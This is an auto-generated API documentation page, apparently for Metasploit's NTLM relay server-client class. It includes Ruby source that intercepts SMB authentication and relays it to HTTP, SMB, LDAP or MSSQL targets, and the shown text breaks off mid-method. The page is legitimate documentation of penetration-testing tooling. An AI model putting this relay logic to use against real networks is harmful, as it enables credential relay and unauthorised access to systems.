adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Remote/SMB/Relay/NTLM/ServerClient.html
T
jenkins-metasploit c3f5bd3de2 Reboot gh-pages
2026-05-08 17:08:43 +00:00

1403 lines
94 KiB
HTML
Raw Blame History

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Class: Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient";
relpath = '../../../../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../../../../_index.html">Index (S)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../SMB.html" title="Msf::Exploit::Remote::SMB (module)">SMB</a></span></span> &raquo; <span class='title'>Relay</span> &raquo; <span class='title'><span class='object_link'><a href="../NTLM.html" title="Msf::Exploit::Remote::SMB::Relay::NTLM (module)">NTLM</a></span></span>
&raquo;
<span class="title">ServerClient</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Class: Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient
</h1>
<div class="box_info">
<dl>
<dt>Inherits:</dt>
<dd>
<span class="inheritName">RubySMB::Server::ServerClient</span>
<ul class="fullTree">
<li>Object</li>
<li class="next">RubySMB::Server::ServerClient</li>
<li class="next">Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient</li>
</ul>
<a href="#" class="inheritanceTree">show all</a>
</dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb</dd>
</dl>
</div>
<h2>Overview</h2><div class="docstring">
<div class="discussion">
<p>This class represents a single connected client to the server. It stores and processes connection specific related information. Has overridden methods than allow smb relay attacks.</p>
</div>
</div>
<div class="tags">
</div>
<h2>
Constant Summary
<small><a href="#" class="constants_summary_toggle">collapse</a></small>
</h2>
<dl class="constants">
<dt id="FORCE_RETRY_SESSION_SETUP-constant" class="">FORCE_RETRY_SESSION_SETUP =
<div class="docstring">
<div class="discussion">
<p>The NT Status that will cause a client to reattempt authentication</p>
</div>
</div>
<div class="tags">
</div>
</dt>
<dd><pre class="code"><span class='op'>::</span><span class='const'>WindowsError</span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_NETWORK_SESSION_EXPIRED</span></pre></dd>
</dl>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#create_relay_client-instance_method" title="#create_relay_client (instance method)">#<strong>create_relay_client</strong>(target, timeout) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#do_session_setup_smb2-instance_method" title="#do_session_setup_smb2 (instance method)">#<strong>do_session_setup_smb2</strong>(request, session) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#do_tree_connect_smb2-instance_method" title="#do_tree_connect_smb2 (instance method)">#<strong>do_tree_connect_smb2</strong>(request, session) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#handle_smb1-instance_method" title="#handle_smb1 (instance method)">#<strong>handle_smb1</strong>(raw_request, header) &#x21d2; RubySMB::GenericPacket </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Handle an SMB version 1 message.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(server, dispatcher, relay_timeout:, relay_targets:, listener:) &#x21d2; ServerClient </a>
</span>
<span class="note title constructor">constructor</span>
<span class="summary_desc"><div class='inline'>
<p>A new instance of ServerClient.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#prepare_relay-instance_method" title="#prepare_relay (instance method)">#<strong>prepare_relay</strong>(session) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#process_gss_spnego_init-instance_method" title="#process_gss_spnego_init (instance method)">#<strong>process_gss_spnego_init</strong>(incoming_security_buffer) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#process_gss_spnego_targ-instance_method" title="#process_gss_spnego_targ (instance method)">#<strong>process_gss_spnego_targ</strong>(incoming_security_buffer) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#relay_ntlmssp-instance_method" title="#relay_ntlmssp (instance method)">#<strong>relay_ntlmssp</strong>(session, incoming_security_buffer = nil) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#valid_ntlm_blob%3F-instance_method" title="#valid_ntlm_blob? (instance method)">#<strong>valid_ntlm_blob?</strong>(blob) &#x21d2; Boolean </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#validate_ntlm_blob!-instance_method" title="#validate_ntlm_blob! (instance method)">#<strong>validate_ntlm_blob!</strong>(blob) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
</ul>
<div id="constructor_details" class="method_details_list">
<h2>Constructor Details</h2>
<div class="method_details first">
<h3 class="signature first" id="initialize-instance_method">
#<strong>initialize</strong>(server, dispatcher, relay_timeout:, relay_targets:, listener:) &#x21d2; <tt><span class='object_link'><a href="" title="Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient (class)">ServerClient</a></span></tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns a new instance of ServerClient.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>relay_targets</span>
<span class='type'>(<tt><span class='object_link'><a href="../../../Relay/TargetList.html" title="Msf::Exploit::Remote::Relay::TargetList (class)">Msf::Exploit::Remote::Relay::TargetList</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>Relay targets</p>
</div>
</li>
<li>
<span class='name'>listener</span>
<span class='type'>(<tt>Object</tt>)</span>
&mdash;
<div class='inline'>
<p>A listener that can receive on_relay_success/on_relay_failure events</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
12
13
14
15
16
17
18
19</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 12</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_server'>server</span><span class='comma'>,</span> <span class='id identifier rubyid_dispatcher'>dispatcher</span><span class='comma'>,</span> <span class='label'>relay_timeout:</span><span class='comma'>,</span> <span class='label'>relay_targets:</span><span class='comma'>,</span> <span class='label'>listener:</span><span class='rparen'>)</span>
<span class='kw'>super</span><span class='lparen'>(</span><span class='id identifier rubyid_server'>server</span><span class='comma'>,</span> <span class='id identifier rubyid_dispatcher'>dispatcher</span><span class='rparen'>)</span>
<span class='ivar'>@timeout</span> <span class='op'>=</span> <span class='id identifier rubyid_relay_timeout'>relay_timeout</span>
<span class='ivar'>@relay_targets</span> <span class='op'>=</span> <span class='id identifier rubyid_relay_targets'>relay_targets</span>
<span class='ivar'>@relay_timeout</span> <span class='op'>=</span> <span class='id identifier rubyid_relay_timeout'>relay_timeout</span>
<span class='ivar'>@listener</span> <span class='op'>=</span> <span class='id identifier rubyid_listener'>listener</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="create_relay_client-instance_method">
#<strong>create_relay_client</strong>(target, timeout) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 285</span>
<span class='kw'>def</span> <span class='id identifier rubyid_create_relay_client'>create_relay_client</span><span class='lparen'>(</span><span class='id identifier rubyid_target'>target</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='rparen'>)</span>
<span class='kw'>case</span> <span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_protocol'>protocol</span>
<span class='kw'>when</span> <span class='symbol'>:http</span><span class='comma'>,</span> <span class='symbol'>:https</span>
<span class='id identifier rubyid_client'>client</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Relay.html" title="Msf::Exploit::Remote::Relay (module)">Relay</a></span></span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Target</span><span class='op'>::</span><span class='const'>HTTP</span><span class='op'>::</span><span class='const'>Client</span><span class='period'>.</span><span class='id identifier rubyid_create'>create</span><span class='lparen'>(</span><span class='kw'>self</span><span class='comma'>,</span> <span class='id identifier rubyid_target'>target</span><span class='comma'>,</span> <span class='id identifier rubyid_logger'>logger</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='rparen'>)</span>
<span class='kw'>when</span> <span class='symbol'>:smb</span>
<span class='id identifier rubyid_client'>client</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Relay.html" title="Msf::Exploit::Remote::Relay (module)">Relay</a></span></span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Target</span><span class='op'>::</span><span class='const'>SMB</span><span class='op'>::</span><span class='const'>Client</span><span class='period'>.</span><span class='id identifier rubyid_create'>create</span><span class='lparen'>(</span><span class='kw'>self</span><span class='comma'>,</span> <span class='id identifier rubyid_target'>target</span><span class='comma'>,</span> <span class='id identifier rubyid_logger'>logger</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='rparen'>)</span>
<span class='kw'>when</span> <span class='symbol'>:ldap</span>
<span class='id identifier rubyid_client'>client</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Relay.html" title="Msf::Exploit::Remote::Relay (module)">Relay</a></span></span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Target</span><span class='op'>::</span><span class='const'>LDAP</span><span class='op'>::</span><span class='const'>Client</span><span class='period'>.</span><span class='id identifier rubyid_create'>create</span><span class='lparen'>(</span><span class='kw'>self</span><span class='comma'>,</span> <span class='id identifier rubyid_target'>target</span><span class='comma'>,</span> <span class='id identifier rubyid_logger'>logger</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='rparen'>)</span>
<span class='kw'>when</span> <span class='symbol'>:mssql</span>
<span class='id identifier rubyid_client'>client</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Relay.html" title="Msf::Exploit::Remote::Relay (module)">Relay</a></span></span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Target</span><span class='op'>::</span><span class='const'>MSSQL</span><span class='op'>::</span><span class='const'>Client</span><span class='period'>.</span><span class='id identifier rubyid_create'>create</span><span class='lparen'>(</span><span class='kw'>self</span><span class='comma'>,</span> <span class='id identifier rubyid_target'>target</span><span class='comma'>,</span> <span class='id identifier rubyid_logger'>logger</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='comma'>,</span> <span class='label'>framework_module:</span> <span class='ivar'>@listener</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_raise'>raise</span> <span class='const'>RuntimeError</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>unsupported protocol: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_protocol'>protocol</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_client'>client</span>
<span class='kw'>rescue</span> <span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>ConnectionTimeout</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_msg'>msg</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Timeout error retrieving server challenge from target </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_content'>. Most likely caused by unresponsive target</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_elog'><span class='object_link'><a href="../../../../../../top-level-namespace.html#elog-instance_method" title="#elog (method)">elog</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_msg'>msg</span><span class='comma'>,</span> <span class='label'>error:</span> <span class='id identifier rubyid_e'>e</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span> <span class='id identifier rubyid_msg'>msg</span>
<span class='kw'>nil</span>
<span class='kw'>rescue</span> <span class='op'>::</span><span class='const'>Exception</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_msg'>msg</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Unable to create relay to </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_elog'><span class='object_link'><a href="../../../../../../top-level-namespace.html#elog-instance_method" title="#elog (method)">elog</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_msg'>msg</span><span class='comma'>,</span> <span class='label'>error:</span> <span class='id identifier rubyid_e'>e</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span> <span class='id identifier rubyid_msg'>msg</span>
<span class='kw'>nil</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="do_session_setup_smb2-instance_method">
#<strong>do_session_setup_smb2</strong>(request, session) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 73</span>
<span class='kw'>def</span> <span class='id identifier rubyid_do_session_setup_smb2'>do_session_setup_smb2</span><span class='lparen'>(</span><span class='id identifier rubyid_request'>request</span><span class='comma'>,</span> <span class='id identifier rubyid_session'>session</span><span class='rparen'>)</span>
<span class='comment'># TODO: Add shared helper for grabbing session lookups
</span> <span class='id identifier rubyid_session_id'>session_id</span> <span class='op'>=</span> <span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_session_id'>session_id</span>
<span class='kw'>if</span> <span class='id identifier rubyid_session_id'>session_id</span> <span class='op'>==</span> <span class='int'>0</span>
<span class='id identifier rubyid_session_id'>session_id</span> <span class='op'>=</span> <span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>1</span><span class='op'>..</span><span class='int'>0xfffffffe</span><span class='rparen'>)</span>
<span class='id identifier rubyid_session'>session</span> <span class='op'>=</span> <span class='ivar'>@session_table</span><span class='lbracket'>[</span><span class='id identifier rubyid_session_id'>session_id</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='op'>::</span><span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Server</span><span class='op'>::</span><span class='const'>Session</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='id identifier rubyid_session_id'>session_id</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_session'>session</span> <span class='op'>=</span> <span class='ivar'>@session_table</span><span class='lbracket'>[</span><span class='id identifier rubyid_session_id'>session_id</span><span class='rbracket'>]</span>
<span class='kw'>if</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_response'>response</span> <span class='op'>=</span> <span class='const'>SMB2</span><span class='op'>::</span><span class='const'>Packet</span><span class='op'>::</span><span class='const'>ErrorPacket</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_USER_SESSION_DELETED</span>
<span class='kw'>return</span> <span class='id identifier rubyid_response'>response</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='comment'># Prepare the relay now, if there&#39;s only one target to relay to and this is the first session setup message
</span> <span class='kw'>if</span> <span class='ivar'>@relay_targets</span> <span class='op'>&amp;&amp;</span> <span class='ivar'>@relay_targets</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span><span class='period'>.</span><span class='id identifier rubyid_size'>size</span> <span class='op'>==</span> <span class='int'>1</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_message_id'>message_id</span> <span class='op'>==</span> <span class='int'>1</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='ivar'>@relay_targets</span><span class='period'>.</span><span class='id identifier rubyid_next'>next</span><span class='lparen'>(</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='id identifier rubyid_prepare_relay'>prepare_relay</span><span class='lparen'>(</span><span class='id identifier rubyid_session'>session</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='comment'># Perform a normal setup flow with ruby_smb
</span> <span class='kw'>unless</span> <span class='id identifier rubyid_session'>session</span><span class='op'>&amp;.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_mode</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_response'>response</span> <span class='op'>=</span> <span class='kw'>super</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_user_id'>user_id</span>
<span class='comment'># TODO: Remove guest flag
</span> <span class='kw'>return</span> <span class='id identifier rubyid_response'>response</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_relay_result'>relay_result</span> <span class='op'>=</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_relay_ntlmssp'>relay_ntlmssp</span><span class='lparen'>(</span><span class='id identifier rubyid_session'>session</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_buffer'>buffer</span><span class='period'>.</span><span class='id identifier rubyid_to_binary_s'>to_binary_s</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>if</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_response'>response</span> <span class='op'>=</span> <span class='op'>::</span><span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>SMB2</span><span class='op'>::</span><span class='const'>Packet</span><span class='op'>::</span><span class='const'>SessionSetupResponse</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_credits'>credits</span> <span class='op'>=</span> <span class='int'>1</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_message_id'>message_id</span> <span class='op'>=</span> <span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_message_id'>message_id</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_session_id'>session_id</span> <span class='op'>=</span> <span class='id identifier rubyid_session_id'>session_id</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>=</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span>
<span class='kw'>if</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>==</span> <span class='op'>::</span><span class='const'>WindowsError</span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_MORE_PROCESSING_REQUIRED</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>=</span> <span class='op'>::</span><span class='const'>WindowsError</span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_MORE_PROCESSING_REQUIRED</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span>
<span class='kw'>if</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:ntlm_wrapper</span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='symbol'>:none</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_buffer'>buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_serialize'>serialize</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:ntlm_wrapper</span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='symbol'>:gss_spnego</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_buffer'>buffer</span> <span class='op'>=</span> <span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Gss</span><span class='period'>.</span><span class='id identifier rubyid_gss_type2'>gss_type2</span><span class='lparen'>(</span><span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_serialize'>serialize</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='ivar'>@dialect</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>0x0311</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_update_preauth_hash'>update_preauth_hash</span><span class='lparen'>(</span><span class='id identifier rubyid_response'>response</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>return</span> <span class='id identifier rubyid_response'>response</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_update_preauth_hash'>update_preauth_hash</span><span class='lparen'>(</span><span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span> <span class='kw'>if</span> <span class='ivar'>@dialect</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>0x0311</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>if</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_SUCCESS</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_credits'>credits</span> <span class='op'>=</span> <span class='int'>32</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_state'>state</span> <span class='op'>=</span> <span class='symbol'>:valid</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_user_id'>user_id</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span>
<span class='comment'># TODO: This is invalid now with the relay logic in place
</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_key'>key</span> <span class='op'>=</span> <span class='ivar'>@gss_authenticator</span><span class='period'>.</span><span class='id identifier rubyid_session_key'>session_key</span>
